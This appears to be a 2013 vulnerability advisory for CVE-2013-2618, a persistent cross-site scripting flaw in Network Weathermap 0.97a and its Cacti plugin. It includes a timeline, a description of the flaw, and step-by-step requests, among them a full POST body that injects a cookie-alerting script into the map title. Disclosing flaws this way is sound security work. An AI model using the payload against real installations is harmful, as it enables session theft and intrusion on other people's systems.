Network Weathermap 0.97a - Persistent XSS Earlier versions are also possibly vulnerable. INFORMATION Product: Network Weathermap 0.97a Remote-exploit: yes Vendor-URL: http://www.network-weathermap.com/ Discovered by: Daniel Ricardo dos Santos CVE Request - 15/03/2013 CVE Assign - 18/03/2013 CVE Number - CVE-2013-2618 Vendor notification - 18/03/2013 Vendor reply - No reply Public disclosure - 01/04/2013 OVERVIEW Network Weathermap 0.97a is vulnerable to a persistent XSS when displaying available files. INTRODUCTION Network Weathermap is a network visualisation tool, to take data you already have and show you an overview of your network in map form. Support is built in for RRD, MRTG (RRD and old log-format), and tab-delimited text files. Other sources are via plugins or external scripts. VULNERABILITY DESCRIPTION The vulnerability happens when a user injects HTML and Javascript into the title of a map in editor.php. This title is later shown to the user when listing the files in editor.php?action=newfile Besides the title, other fields also allow an attacker to upload malicious PHP code to a webserver, which can later be executed if the attacker has direct acess to that file. This application is often used as a plugin for Cacti. The vulnerability can be exploited in this mode as well, in weathermap-cacti-plugin-mgmt.php?action=viewconfig&file=<affected_file> and it can be used to exploit Cacti. To test it, simply create a map or edit an existing one: GET editor.php?mapname=test&action=newmap Then edit the map title with the payload: POST editor.php plug=0&mapname=test&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&link_commentin=&link_commentposin=95&link_commentout=&link_commentposout=5&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&map_legend=Traffic+Load&map_stamp=Created%3A+%25b+%25d+%25Y+%25H%3A%25M%3A%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=&editorsettings_showvias=0&editorsettings_showrelative=0&editorsettings_gridsnap=NO Then display the titles: GET editor.php VERSIONS AFFECTED Tested with version 0.97a (current release) but earlier versions are possibly vulnerable. SOLUTION There is no official patch currently available. NOTES The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-2618 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CREDITS Daniel Ricardo dos Santos SEC+ Information Security Company - http://www.secplus.com.br/